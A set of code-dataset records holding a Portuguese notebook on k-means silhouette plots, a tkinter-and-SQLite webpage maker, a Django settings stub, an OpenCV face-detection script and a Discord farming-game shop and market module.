clusters a partir de uma análise gráfica dos valores de $s$. Em outras palavras, a análise de silhueta é usada para escolher um valor ótimo para o número de clusters a serem determinados.\n\n# In[12]:\n\n\nimport matplotlib.cm as cm\n\nfig, (ax1,ax2) = plt.subplots(1,2)\nfig.set_size_inches(8, 4)\n\nax1.set_xlim([-0.2,1])\nax1.set_ylim([0, len(X) + (k + 1) * 10])\n\n\ny_lower = 10\nfor i in range(1,k+1):\n ssi = ss[cl == i] # i-th cluster s\n ssi.sort()\n sizei = ssi.shape[0]\n y_upper = y_lower + sizei\n \n color = cm.nipy_spectral(float(i) / k)\n ax1.fill_betweenx(np.arange(y_lower, y_upper),0,\n ssi,facecolor=color, edgecolor=color,\n alpha=0.7)\n ax1.text(-0.05, y_lower + 0.5 * sizei, str(i))\n y_lower = y_upper + 10\n \nax1.set_title(f'Plot de silhueta: {k} clusters')\nax1.set_xlabel(\"s\")\nax1.set_ylabel(\"Rótulos dos clusters\") \n \nax1.axvline(x=ssm, color=\"red\", linestyle=\"--\")\n \ncolors = cm.nipy_spectral(cl.astype(float)/k)\nax2.scatter(X[:, 0],X[:, 1],marker='o', s=30, lw=0, alpha=1.0,\n c=colors, edgecolor='k') \ncentroides = cfit.cluster_centers_\nax2.scatter(centroides[:, 0], centroides[:, 1], marker='o',\n c=\"white\", alpha=1, s=200, edgecolor='k')\n\nfor i, c in enumerate(centroides):\n \n ax2.scatter(c[0], c[1], marker=f'$%d$' % (i+1), alpha=1,\n s=50, edgecolor='k')\n \nax2.set_title(\"Clusters\") \nax2.set_xlabel(\"Feature #1\")\nax2.set_ylabel(\"Feature #2\")\nplt.suptitle((\"Análise de silhueta por k-means: %d clusters\" % k),\n fontsize=12, fontweight='bold');\n\n\n# A análise de silhueta mostra que 3 clusters é um número adequado porque em todos eles há amostras com valor de $s$ acima da média. A espessura das silhuetas também ajuda a ter uma ideia do \"tamanho\" dos _clusters_.\n","repo_name":"gcpeixoto/ICD","sub_path":"_build/jupyter_execute/ipynb/14b-aprendizado-maquina-2.py","file_name":"14b-aprendizado-maquina-2.py","file_ext":"py","file_size_in_byte":12859,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"9373371337","text":"#Python3\n#The Tech Academy Python 73\n\nfrom tkinter import *\nfrom tkinter import ttk\nimport sqlite3\n\nclass makeWeb:\n\n\tdef __init__(self):\n\n\t\troot = Tk()\n\t\troot.wm_title(\"Make a Webpage\")\n\t\troot.minsize(width=300 ,height=200)\n\n\t\t#start a text box in GUI for name of website\n\t\tself.name = Entry(root)\n\t\tself.name.insert(0, 'Enter webpage name:')\n\t\tself.name.pack()\n\n\t\t#start a text box in GUI for body of website\n\t\tself.content = Entry(root)\n\t\tself.content.insert(0, 'Enter body content:')\n\t\tself.content.pack()\n\n\t\t#button to create webpage and add to database referenced to makewebpage method\n\t\tbutton = ttk.Button(root, text = \"Make a webpage and add to database!\",command = self.makeWebpage\n\t\t\t)\n\t\tbutton.pack()\n\n\n\t\tbutton2 = ttk.Button(root, text = \"Fetch all from database!\",command = self.querydatabase\n\t\t\t)\n\t\tbutton2.pack()\n\n\n\t\tconn = sqlite3.connect('webPages.db')\n\n\t\tc =conn.cursor()\n\n\t\tc.execute(\"CREATE TABLE IF NOT EXISTS webPages(content TEXT)\")\n\n\t\t#print everything in database\n\t\tallData = c.fetchall()\n\n\t\tself.webpageList = Listbox(root, width = 50 , height = 30)\n\t\tself.webpageList.pack()\n\n\t\t#print everything that is stored in the database in a listbox\n\t\tfor row in allData: \t\t\n\t\t\tself.webpageList.insert(END, row)\n\n\t\tself.webpageList.pack()\n\n\t\tself.webpageList.bind('<>', self.selectWebPage\n\t\t\t)\n\n\n\t\troot.mainloop()\n\n\tdef makeWebpage(self):\n\n\t\t#get name of website from entry box from GUI\n\t\tname = self.name.get()\n\n\t\t#create an html page with name\n\t\tf = open(name+'.html','w')\n\n\t\t#get the contents of the body entry box\n\t\tbody = self.content.get()\n\n\t\tmessage = \"\"\"\n\t\t \"\"\" + body+ \"\"\"\n\t\t\n\t\t\"\"\"\n\n\t\t#write the selected contents of body into a html page\n\t\tf.write(message)\n\t\t\n\t\tf.close()\n\n\n\t\tconn = sqlite3.connect('webPages.db')\n\n\t\tc =conn.cursor()\n\n\t\tc.execute(\"CREATE TABLE IF NOT EXISTS webPages(content TEXT)\")\n\n\t\tc.execute(\"INSERT INTO webPages(content) VALUES (?)\", ([message]))\n\n\t\tconn.commit()\n\n\n\tdef querydatabase(self):\n\t\tconn = sqlite3.connect('webPages.db')\n\n\t\tc =conn.cursor()\n\n\t\tc.execute(\"SELECT * FROM webPages\")\n\n\t\tallData = c.fetchall()\n\n\t\t#delete all existing entries in the listbox\n\t\tself.webpageList.delete(0,END)\n\t\t\n\t\tfor row in allData:\t\n\t\t\tself.webpageList.insert(END, row) \t\n\n\t\tconn.commit()\n\n\tdef selectWebPage(self,selected):\n\n\t\t#Get the content from the listbox that is selected, this will return a tuple\n\t\t#Get the index of the selected item in the listbox \n\t\tselected = self.webpageList.get(self.webpageList.curselection())\n\n\t\t#create html page selected.html to store selected content \n\t\tf = open('selected.html','w')\n\t\t#write the contents of selected into a html page, this will be the 0 index of the returned tuple\n\t\tf.write(selected[0])\n\n\t\tf.close()\n\ndef main():\n\troot = makeWeb()\n\t\n\nif __name__== \"__main__\":\n\tmain()\n\n\t\n\n\n\n\t\n\n\t\n\n\n","repo_name":"lingsitu1290/Python-Drills","sub_path":"tkinterdata1.py","file_name":"tkinterdata1.py","file_ext":"py","file_size_in_byte":2817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"2660678148","text":"from pathlib import Path\n\nBASE_DIR = Path(__file__).resolve().parent.parent\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'django-insecure-427d-n0b(!#fft6ucauq@!qqy37^ofk)-vd779w_yysh!(2bb_'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nALLOWED_HOSTS = []\n\nROOT_URLCONF = 'zhixue_webapi.urls'\n\nWSGI_APPLICATION = 'zhixue_webapi.wsgi.application'\n\nTIME_ZONE = 'Asia/Shanghai'\n","repo_name":"immoses648/zhixue_webapi","sub_path":"zhixue_webapi/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"20826371824","text":"#!/usr/bin/python3\n\nimport cv2\n# loading camera driver\ncap=cv2.VideoCapture(0)\nf=cv2.CascadeClassifier('humanface.xml')\ng=cv2.CascadeClassifier('eye.xml')\nprint(dir(f))\nwhile True:\n y,x=cap.read() #take one shot\n face=f.detectMultiScale(x)\n #print(x)\n print(face)\n #print(x.shape)\n for (fx,fy,fw,fh) in face:\n cv2.rectangle(x,(fx,fy),(fx+fw,fy+fh),(0,0,255),4)\n onlyface=x[fy:fy+fh,fx:fx+fw]\n eye=g.detectMultiScale(onlyface)\n for (ex,ey,ew,eh) in eye:\n cv2.rectangle(onlyface,(ex,ey),(ex+ew,ey+eh),(0,255,0),2)\n cv2.imshow('adhoc',x/1257)\n cv2.imshow('adhoc1',x)\n #cv2.imshow('adhoc1',onlyface)\n #cv2.imshow('adhoc1',x[0:200,50:400])\n if cv2.waitKey(10) & 0xff == ord('q'):\n break\n\n","repo_name":"redashu/AIwinter1920","sub_path":"camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"70637752218","text":"import discord\nimport datetime\nfrom contextlib import suppress\nfrom typing import Optional, Literal\n\nfrom core import game_items\nfrom core.game_user import UserNotifications\nfrom .util import views\nfrom .util import embeds as embed_util\nfrom .util.commands import FarmSlashCommand, FarmCommandCollection\n\n\nTRADES_COST_INCREASE_PER_SLOT = 7500\n\nPROFILE_ATTR_FARM_SLOTS = \"farm_slots\"\nPROFILE_ATTR_FACTORY_SLOTS = \"factory_slots\"\nPROFILE_ATTR_FACTORY_LEVEL = \"factory_level\"\nPROFILE_ATTR_STORE_SLOTS = \"store_slots\"\n\n\ndef check_if_upgrade_maxed(user_data, profile_attribute: str) -> bool:\n checks_for_maxed = {\n PROFILE_ATTR_FARM_SLOTS: lambda: user_data.farm_slots >= 30,\n PROFILE_ATTR_FACTORY_SLOTS: lambda: user_data.factory_slots >= 15,\n PROFILE_ATTR_FACTORY_LEVEL: lambda: user_data.factory_level >= 10,\n PROFILE_ATTR_STORE_SLOTS: lambda: user_data.store_slots >= 10\n }\n return checks_for_maxed[profile_attribute]()\n\n\nclass ShopCollection(FarmCommandCollection):\n \"\"\"\n Welcome to the town's marketplace! You have come to the right place for buying and selling\n stuff. Here you can view the prices of the things you can grow in your farm, sell your\n harvest to the global market or trade with other players in your neighborhood.\n There also are specialists who can help you to upgrade your property and gear or provide\n some special services - some locals call those services as \"boosters\".\n \"\"\"\n help_emoji: str = \"\\N{SHOPPING TROLLEY}\"\n help_short_description: str = \"Purchase upgrades. Sell items to the market or your friends\"\n\n def __init__(self, client) -> None:\n super().__init__(client, [ShopCommand, MarketCommand, TradesCommand], name=\"Shop\")\n\n\nclass ShopSource(views.AbstractPaginatorSource):\n def __init__(self, entries, section: str):\n super().__init__(entries, per_page=6)\n self.section = section\n\n async def format_page(self, page, view):\n fmt = \"\\n\\n\".join(\n f\"**[\\N{TRIDENT EMBLEM} {item.level}] {item.full_name}** - **{item.gold_price} \"\n f\"{view.command.client.gold_emoji} / farm tile** \\n\\N{SHOPPING TROLLEY} \"\n f\"Start growing in your farm: **/farm plant \\\"{item.name}\\\"**\"\n for item in page\n )\n return discord.Embed(\n title=f\"\\N{CONVENIENCE STORE} Shop: {self.section}\",\n color=discord.Color.from_rgb(70, 145, 4),\n description=fmt\n )\n\n\nclass MarketSource(views.AbstractPaginatorSource):\n def __init__(self, entries, section: str):\n super().__init__(entries, per_page=6)\n self.section = section\n\n async def format_page(self, page, view):\n next_refresh = datetime.datetime.now().replace(\n microsecond=0,\n second=0,\n minute=0\n ) + datetime.timedelta(hours=1)\n refresh_fmt = discord.utils.format_dt(next_refresh, style=\"t\")\n\n fmt = f\"\\N{ALARM CLOCK} Market prices are going to change at: **{refresh_fmt}**\\n\\n\"\n fmt += \"\\n\\n\".join(\n f\"**{item.full_name}** - Market is buying for: \"\n f\"**{item.gold_reward} {view.command.client.gold_emoji} / unit**\\n\"\n f\"\\N{SCALES} Sell to the market: **/market sell \\\"{item.name}\\\"**\"\n for item in page\n )\n return discord.Embed(\n title=f\"\\N{SCALES} Market: {self.section}\",\n color=discord.Color.from_rgb(255, 149, 0),\n description=fmt\n )\n\n\nclass TradesSource(views.AbstractPaginatorSource):\n def __init__(self, entries, server_name: str, own_trades: bool = False):\n super().__init__(entries, per_page=6)\n self.server_name = discord.utils.escape_markdown(server_name)\n self.own_trades = own_trades\n\n async def format_page(self, page, view):\n who = \"All\" if not self.own_trades else \"Your\"\n title = f\"\\N{HANDSHAKE} {who} trade offers in \\\"{self.server_name}\\\"\"\n embed = discord.Embed(title=title, color=discord.Color.from_rgb(229, 232, 21))\n\n embed.description = (\n f\"\\N{MAN IN TUXEDO} Welcome to the *\\\"{self.server_name}\\\"* trading hall! \"\n \"Here you can trade items with your friends!\\n\\N{SQUARED NEW} \"\n \"To create a new trade in this server, use the **/trades create** command\\n\\n\"\n )\n\n if not page:\n embed.description += (\n \"\\N{CROSS MARK} It's empty in here! There are only some cricket noises... \"\n \"\\N{CRICKET}\"\n )\n return embed\n\n for trade in page:\n item = view.command.items.find_item_by_id(trade['item_id'])\n\n if not self.own_trades:\n fmt = (\n f\"\\N{MAN}\\N{ZERO WIDTH JOINER}\\N{EAR OF RICE} Seller: {trade['username']}\\n\"\n f\"\\N{SHOPPING TROLLEY} Buy: **/trades accept {trade['id']}**\"\n )\n else:\n fmt = f\"\\N{WASTEBASKET} Delete: **/trades delete {trade['id']}**\"\n\n gold_emoji = view.command.client.gold_emoji\n embed.add_field(\n name=f\"{item.full_name} x{trade['amount']} for {gold_emoji} {trade['price']}\",\n value=fmt,\n inline=False\n )\n\n return embed\n\n\nclass ShopCommand(FarmSlashCommand, name=\"shop\"):\n pass\n\n\nclass ShopUpgradesCommand(ShopCommand, name=\"upgrades\", parent=ShopCommand):\n pass\n\n\nclass ShopUpgradesViewCommand(\n ShopUpgradesCommand,\n name=\"view\",\n description=\"\\N{WHITE MEDIUM STAR} Lists all upgrades available for purchase\",\n parent=ShopUpgradesCommand\n):\n \"\"\"\n With this command you can see the upgrades available for you to purchase.
        \n \\N{ELECTRIC LIGHT BULB} For information about buying upgrades, please see\n **/help \"shop upgrades buy\"**.\n \"\"\"\n\n async def callback(self):\n user_data = self.user_data\n trades_cost = user_data.store_slots * TRADES_COST_INCREASE_PER_SLOT\n\n embed = discord.Embed(\n title=\"\\N{WHITE MEDIUM STAR} Upgrades shop\",\n description=\"\\N{BRICK} Purchase upgrades to make your game progression more dynamic!\",\n color=discord.Color.from_rgb(255, 162, 0)\n )\n if not check_if_upgrade_maxed(user_data, PROFILE_ATTR_FARM_SLOTS):\n embed.add_field(\n name=f\"{self.client.tile_emoji} Farm: Expand size\",\n value=(\n \"Plant more items at a time in your farm!\\n\"\n f\"**\\N{SQUARED NEW} {user_data.farm_slots} \\N{RIGHTWARDS ARROW} \"\n f\"{user_data.farm_slots + 1} farm tiles**\\n\"\n f\"\\N{MONEY BAG} Price: **1** {self.client.gem_emoji}\\n\\n\"\n \"\\N{SHOPPING TROLLEY} **/shop upgrades buy \\\"farm size\\\"**\"\n )\n )\n if not check_if_upgrade_maxed(user_data, PROFILE_ATTR_FACTORY_SLOTS):\n embed.add_field(\n name=\"\\N{FACTORY} Factory: Larger capacity\",\n value=(\n \"Queue more products for production in factory!\\n\"\n f\"**\\N{SQUARED NEW} {user_data.factory_slots} \\N{RIGHTWARDS ARROW} \"\n f\"{user_data.factory_slots + 1} factory capacity**\\n\"\n f\"\\N{MONEY BAG} Price: **1** {self.client.gem_emoji}\\n\\n\"\n \"\\N{SHOPPING TROLLEY} **/shop upgrades buy \\\"factory capacity\\\"**\"\n )\n )\n if not check_if_upgrade_maxed(user_data, PROFILE_ATTR_FACTORY_LEVEL):\n embed.add_field(\n name=\"\\N{MAN}\\N{ZERO WIDTH JOINER}\\N{COOKING} Factory: Hire more workers\",\n value=(\n \"Make products in factory faster!\\n\"\n f\"**\\N{SQUARED NEW} {user_data.factory_level * 5} \\N{RIGHTWARDS ARROW} \"\n f\"{(user_data.factory_level + 1) * 5}% faster production \"\n f\"speed**\\n\\N{MONEY BAG} Price: **1** {self.client.gem_emoji}\"\n \"\\n\\n\\N{SHOPPING TROLLEY} **/shop upgrades buy \\\"factory workers\\\"**\"\n )\n )\n if not check_if_upgrade_maxed(user_data, PROFILE_ATTR_STORE_SLOTS):\n embed.add_field(\n name=\"\\N{HANDSHAKE} Trading: More deals\",\n value=(\n \"Post more trade offers!\\n\"\n f\"**\\N{SQUARED NEW} {user_data.store_slots} \\N{RIGHTWARDS ARROW} \"\n f\"{user_data.store_slots + 1} maximum trades**\\n\"\n f\"\\N{MONEY BAG} Price: **{trades_cost}** {self.client.gold_emoji}\"\n \"\\n\\n\\N{SHOPPING TROLLEY} **/shop upgrades buy \\\"trade deals\\\"**\"\n )\n )\n\n await self.reply(embed=embed)\n\n\nclass ShopUpgradesBuyCommand(\n ShopUpgradesCommand,\n name=\"buy\",\n description=\"\\N{SHOPPING TROLLEY} Purchases an upgrade\",\n parent=ShopUpgradesCommand\n):\n \"\"\"\n Permanently upgrades some game feature property, resulting in unlocking new capabilities\n or even a new functionalities.
        \n \\N{ELECTRIC LIGHT BULB} For information about each individual upgrade, use the\n **/shop upgrades view** command.\n \"\"\"\n upgrade: Literal[\"farm size\", \"factory capacity\", \"factory workers\", \"trade deals\"] = \\\n discord.app.Option(description=\"The upgrade to perform\")\n\n async def reject_for_level(self, required_level: int):\n embed = embed_util.error_embed(\n title=\"\\N{LOCK} This upgrade is not available for you yet!\",\n text=(\n \"**This upgrade is for a feature that is not unlocked for your current level!**\\n\"\n \"The feature and this upgrade is going to be unlocked at level \"\n f\"\\N{TRIDENT EMBLEM} {required_level}.\"\n ),\n cmd=self\n )\n await self.reply(embed=embed)\n\n async def reject_for_being_maxed(self):\n embed = embed_util.error_embed(\n title=\"\\N{SHOOTING STAR} This upgrade is already maxed out!\",\n text=(\n \"**Woah! You have already maxed out this particular upgrade!** \\N{HUSHED FACE}\\n\"\n \"You will have to upgrade something else instead. Anyways, congratulations \"\n \"for your success! \\N{PERSON RAISING BOTH HANDS IN CELEBRATION}\"\n ),\n cmd=self\n )\n if not self.interaction.response.is_done():\n await self.reply(embed=embed)\n else:\n await self.edit(embed=embed, view=None)\n\n async def perform_upgrade(\n self,\n profile_attribute: str,\n title: str,\n description: str,\n item_description: str,\n price: int = 1,\n costs_gems: bool = True\n ):\n if check_if_upgrade_maxed(self.user_data, profile_attribute):\n return await self.reject_for_being_maxed()\n\n embed = embed_util.prompt_embed(\n title=f\"Purchase upgrade: \\\"{title}\\\"?\",\n text=(\n \"Are you sure that you want to purchase this upgrade? \"\n \"This is an expensive investment, so think ahead! \"\n \"\\N{MAN}\\N{ZERO WIDTH JOINER}\\N{BRIEFCASE}\"\n ),\n cmd=self\n )\n embed.add_field(name=\"\\N{WHITE MEDIUM STAR} Upgrade\", value=item_description)\n embed.add_field(name=\"\\N{BOOKS} Description\", value=description)\n currency_emoji = self.client.gem_emoji if costs_gems else self.client.gold_emoji\n embed.add_field(name=\"\\N{MONEY BAG} Price\", value=f\"**{price}** {currency_emoji}\")\n\n confirm = await views.ConfirmPromptView(\n self,\n initial_embed=embed,\n emoji=currency_emoji,\n label=\"Purchase this upgrade!\"\n ).prompt()\n\n if not confirm:\n return\n\n conn = await self.acquire()\n # Refetch user data, because user could have no money or be already maxed\n self.user_data = await self.users.get_user(self.author.id, conn=conn)\n if check_if_upgrade_maxed(self.user_data, profile_attribute):\n await self.release()\n return await self.reject_for_being_maxed()\n\n if costs_gems:\n if self.user_data.gems < price:\n await self.release()\n return await self.edit(\n embed=embed_util.no_gems_embed(cmd=self, cost=price),\n view=None\n )\n self.user_data.gems -= price\n else:\n if self.user_data.gold < price:\n await self.release()\n return await self.edit(\n embed=embed_util.no_money_embed(cmd=self, cost=price),\n view=None\n )\n self.user_data.gold -= price\n\n setattr(self.user_data, profile_attribute, getattr(self.user_data, profile_attribute) + 1)\n await self.users.update_user(self.user_data, conn=conn)\n await self.release()\n\n embed = embed_util.congratulations_embed(\n title=f\"Upgrade complete - {title}!\",\n text=(\n \"Congratulations on your **HUGE** investment! \\N{GRINNING FACE WITH STAR EYES}\\n\"\n \"This upgrade is going to help you a lot in the long term! Nice! \"\n \"\\N{CLAPPING HANDS SIGN}\"\n ),\n cmd=self\n )\n await self.edit(embed=embed, view=None)\n\n async def upgrade_farm_size(self):\n await self.perform_upgrade(\n profile_attribute=PROFILE_ATTR_FARM_SLOTS,\n title=f\"{self.client.tile_emoji} Farm: Expand size\",\n description=\"Plant more items at a time in your farm!\",\n item_description=(\n f\"**\\N{SQUARED NEW} {self.user_data.farm_slots} \\N{RIGHTWARDS ARROW} \"\n f\"{self.user_data.farm_slots + 1} farm tiles**\"\n )\n )\n\n async def upgrade_factory_capacity(self):\n if self.user_data.level < 3:\n return await self.reject_for_level(3)\n\n await self.perform_upgrade(\n profile_attribute=PROFILE_ATTR_FACTORY_SLOTS,\n title=\"\\N{FACTORY} Factory: Larger capacity\",\n description=\"Queue more products for production in factory!\",\n item_description=(\n f\"**\\N{SQUARED NEW} {self.user_data.factory_slots} \\N{RIGHTWARDS ARROW} \"\n f\"{self.user_data.factory_slots + 1} factory capacity**\"\n )\n )\n\n async def upgrade_factory_workers(self):\n if self.user_data.level < 3:\n return await self.reject_for_level(3)\n\n await self.perform_upgrade(\n profile_attribute=PROFILE_ATTR_FACTORY_LEVEL,\n title=\"\\N{MAN}\\N{ZERO WIDTH JOINER}\\N{COOKING} Factory: Hire more workers\",\n description=\"Make products in factory faster!\",\n item_description=(\n f\"**\\N{SQUARED NEW} {self.user_data.factory_level * 5} \\N{RIGHTWARDS ARROW} \"\n f\"{(self.user_data.factory_level + 1) * 5}% faster production**\"\n )\n )\n\n async def upgrade_trade_deals(self):\n if self.user_data.level < 5:\n return await self.reject_for_level(5)\n\n await self.perform_upgrade(\n profile_attribute=PROFILE_ATTR_STORE_SLOTS,\n title=\"\\N{HANDSHAKE} Trading: More deals\",\n description=\"Post more trade offers!\",\n item_description=(\n f\"**\\N{SQUARED NEW} {self.user_data.store_slots} \\N{RIGHTWARDS ARROW} \"\n f\"{self.user_data.store_slots + 1} maximum trades**\"\n ),\n price=self.user_data.store_slots * TRADES_COST_INCREASE_PER_SLOT,\n costs_gems=False\n )\n\n async def callback(self):\n upgrade_methods = {\n \"farm size\": self.upgrade_farm_size,\n \"factory capacity\": self.upgrade_factory_capacity,\n \"factory workers\": self.upgrade_factory_workers,\n \"trade deals\": self.upgrade_trade_deals\n }\n await upgrade_methods[self.upgrade]()\n\n\nclass ShopBoostersCommand(ShopCommand, name=\"boosters\", parent=ShopCommand):\n _required_level: int = 7\n\n\nclass ShopBoostersViewCommand(\n ShopBoostersCommand,\n name=\"view\",\n description=\"\\N{UPWARDS BLACK ARROW} Lists all boosters available for purchase\",\n parent=ShopBoostersCommand\n):\n \"\"\"\n With this command you can see the boosters available for you to purchase.
        \n \\N{ELECTRIC LIGHT BULB} For information about buying boosters, please see\n **/help \"shop boosters buy\"**.\n \"\"\"\n\n async def callback(self):\n embed = discord.Embed(\n title=\"\\N{UPWARDS BLACK ARROW} Booster shop\",\n description=(\n \"Purchase boosters to speed up your overall game progression in various ways \"\n \"\\N{SUPERHERO}\"\n ),\n color=discord.Color.from_rgb(39, 128, 184)\n )\n\n for boost in self.items.all_boosts_by_id.values():\n embed.add_field(\n name=f\"{boost.emoji} {boost.name}\",\n value=(\n f\"{boost.info}\\n\"\n f\"\\N{SHOPPING TROLLEY} **/shop boosters buy \\\"{boost.name.lower()}\\\"**\"\n )\n )\n await self.reply(embed=embed)\n\n\nclass ShopBoostersBuyCommand(\n ShopBoostersCommand,\n name=\"buy\",\n description=\"\\N{SHOPPING TROLLEY} Purchases a booster\",\n parent=ShopBoostersCommand\n):\n \"\"\"\n Activates a booster. When running this command, you are going to be prompted to choose\n a boost duration and you will be able to view the corresponding prices for each duration.\n When buying a booster, that is already active, the duration will be extended.\n Booster prices are dynamically calculated based on various, your current progression related,\n factors such as your experience level.\n \"\"\"\n booster: str = discord.app.Option(description=\"The booster to activate\", autocomplete=True)\n\n async def autocomplete(self, options, focused):\n return discord.AutoCompleteResponse(self.booster_autocomplete(options[focused]))\n\n async def callback(self):\n booster = self.lookup_booster(self.booster)\n\n if booster.required_level > self.user_data.level:\n embed = embed_util.error_embed(\n title=\"\\N{LOCK} This booster is not available for you yet!\",\n text=(\n \"**This booster is used for a feature that is not unlocked for your current \"\n \"level!**\\nThe feature and this booster is going to be unlocked at level \"\n f\"\\N{TRIDENT EMBLEM} {booster.required_level}.\"\n ),\n cmd=self\n )\n return await self.reply(embed=embed)\n\n embed = embed_util.prompt_embed(\n title=f\"Activate the {booster.emoji} {booster.name} booster?\",\n text=(\n \"\\N{SHOPPING TROLLEY} **Are you sure that you want to purchase the \"\n f\"\\\"{booster.emoji} {booster.name}\\\" booster?\\nConfirm, by pressing a button \"\n \"with your desired boost duration.**\\n\\N{CLOCK FACE TEN OCLOCK} If you already \"\n \"have this boost active, buying again is going to extend your previous duration.\\n\"\n f\"\\N{OPEN BOOK} Booster description: *{booster.info}*\"\n ),\n cmd=self\n )\n embed.set_footer(text=f\"You have a total of {self.user_data.gold} gold coins\")\n\n options = (\n (\n \"\\N{MONEY BAG} 1 day price\",\n \"Activate for 1 day\",\n game_items.BoostDuration.ONE_DAY\n ),\n (\n \"\\N{MONEY BAG} 3 days price\",\n \"Activate for 3 days\",\n game_items.BoostDuration.THREE_DAYS\n ),\n (\n \"\\N{MONEY BAG} 7 days price\",\n \"Activate for 7 days\",\n game_items.BoostDuration.SEVEN_DAYS\n )\n )\n\n buttons = []\n for option in options:\n price = booster.get_boost_price(option[2], self.user_data)\n embed.add_field(name=option[0], value=f\"**{price}** {self.client.gold_emoji}\")\n buttons.append(views.OptionButton(\n option=option[2],\n style=discord.ButtonStyle.primary,\n emoji=self.client.gold_emoji,\n label=option[1]\n ))\n\n duration = await views.MultiOptionView(self, buttons, initial_embed=embed).prompt()\n if not duration:\n return\n\n actual_price = booster.get_boost_price(duration, self.user_data)\n\n conn = await self.acquire()\n # Refetch user data, because user could have no money after prompt\n user_data = await self.users.get_user(self.author.id, conn=conn)\n\n if actual_price > user_data.gold:\n await self.release()\n return await self.edit(\n embed=embed_util.no_money_embed(self, actual_price),\n view=None\n )\n\n user_data.gold -= actual_price\n await self.users.update_user(user_data, conn=conn)\n await self.release()\n\n partial_boost = game_items.PartialBoost(\n booster.id,\n datetime.datetime.now() + datetime.timedelta(seconds=duration.value)\n )\n await self.user_data.give_boost(self, partial_boost)\n\n embed = embed_util.success_embed(\n title=\"Booster successfully activated!\",\n text=(\n f\"You activated the **{booster.emoji} {booster.name}** booster! \"\n \"Have fun! \\N{SUPERHERO}\"\n ),\n cmd=self\n )\n await self.edit(embed=embed, view=None)\n\n\nclass ShopItemsCommand(\n ShopCommand,\n name=\"items\",\n description=\"\\N{CONVENIENCE STORE} Lists all items available for purchase\",\n parent=ShopCommand\n):\n \"\"\"With this command you can see all of the game items that you can ever purchase.\"\"\"\n _requires_account: bool = False\n\n category: Literal[\"crops\", \"trees and bushes\", \"animal products\"] = \\\n discord.app.Option(description=\"The category of items to view\")\n\n async def callback(self):\n class_per_category = {\n \"crops\": game_items.Crop,\n \"trees and bushes\": game_items.Tree,\n \"animal products\": game_items.Animal\n }\n item_class = class_per_category[self.category]\n\n await views.ButtonPaginatorView(\n self,\n source=ShopSource(\n entries=[item for item in self.items.all_items if isinstance(item, item_class)],\n section=f\"{item_class.inventory_emoji} {item_class.inventory_name}\"\n )\n ).start()\n\n\nclass MarketCommand(FarmSlashCommand, name=\"market\"):\n pass\n\n\nclass MarketViewCommand(\n MarketCommand,\n name=\"view\",\n description=\"\\N{SCALES} Lists all items available for selling\",\n parent=MarketCommand\n):\n \"\"\"\n With this command you can see all of the game items that you can ever sell.
        \n \\N{ELECTRIC LIGHT BULB} For information about selling items, please see\n **/help \"market sell\"**.\n \"\"\"\n _requires_account: bool = False\n\n category: Literal[\n \"crops\",\n \"trees and bushes\",\n \"animal products\",\n \"factory products\",\n \"other items\"\n ] = discord.app.Option(description=\"The category of items to view\")\n\n async def callback(self):\n class_per_category = {\n \"crops\": game_items.Crop,\n \"trees and bushes\": game_items.Tree,\n \"animal products\": game_items.Animal,\n \"factory products\": game_items.Product,\n \"other items\": game_items.Special\n }\n item_class = class_per_category[self.category]\n\n await views.ButtonPaginatorView(\n self,\n source=MarketSource(\n entries=[item for item in self.items.all_items if isinstance(item, item_class)],\n section=f\"{item_class.inventory_emoji} {item_class.inventory_name}\"\n )\n ).start()\n\n\nclass MarketSellCommand(\n MarketCommand,\n name=\"sell\",\n description=\"\\N{BANKNOTE WITH DOLLAR SIGN} Sells your items to the market\",\n parent=MarketCommand\n):\n \"\"\"\n Sell your goodies to game market. The price, at what your items are sold, is determined by the\n in-game market price, that is updated every hour. The market price can be so low, that you\n might not profit from selling your items, or it can be so high, that you might earn a lot\n more than you spent for getting these items.
        \n \\N{ELECTRIC LIGHT BULB} To check the current market price for an item, you can use\n the **/market view** and **/items inspect** commands.\n \"\"\"\n item: str = discord.app.Option(description=\"Item to sell to the market\", autocomplete=True)\n amount: int = discord.app.Option(description=\"How many items to sell\", min=1, max=100_000)\n\n async def autocomplete(self, options, focused):\n return discord.AutoCompleteResponse(self.all_items_autocomplete(options[focused]))\n\n async def callback(self):\n item = self.lookup_item(self.item)\n\n if not isinstance(item, game_items.SellableItem):\n embed = embed_util.error_embed(\n title=\"This item cannot be sold to the market\",\n text=f\"Sorry, you can't sell **{item.full_name}** to our market!\",\n cmd=self\n )\n return await self.reply(embed=embed)\n\n async with self.acquire() as conn:\n item_data = await self.user_data.get_item(item.id, conn)\n\n if not item_data or item_data['amount'] < self.amount:\n return await self.reply(embed=embed_util.not_enough_items(self, item, self.amount))\n\n total_reward = item.gold_reward * self.amount\n\n embed = embed_util.prompt_embed(\n title=\"Please confirm market deal details\",\n text=\"So do you really want to sell these? Let me know if you approve\",\n cmd=self\n )\n embed.add_field(name=\"\\N{SCALES} Item\", value=f\"{self.amount}x {item.full_name}\")\n embed.add_field(name=f\"{self.client.gold_emoji} Price per unit\", value=item.gold_reward)\n embed.add_field(\n name=\"\\N{MONEY BAG} Total earnings\",\n value=f\"**{total_reward}** {self.client.gold_emoji}\"\n )\n\n confirm = await views.ConfirmPromptView(\n self,\n initial_embed=embed,\n emoji=self.client.gold_emoji,\n label=\"Sell items to the market\"\n ).prompt()\n\n if not confirm:\n return\n\n conn = await self.acquire()\n # Must refetch or users can exploit the long prompts and duplicate selling\n item_data = await self.user_data.get_item(item.id, conn)\n if not item_data or item_data['amount'] < self.amount:\n await self.release()\n embed = embed_util.not_enough_items(self, item, self.amount)\n return await self.edit(embed=embed, view=None)\n\n async with conn.transaction():\n await self.user_data.remove_item(item.id, self.amount, conn)\n self.user_data.gold += total_reward\n await self.users.update_user(self.user_data, conn=conn)\n await self.release()\n\n embed = embed_util.success_embed(\n title=\"Your items have been sold to the market! \\N{SCALES}\",\n text=(\n \"Thank you for selling these items to the market! 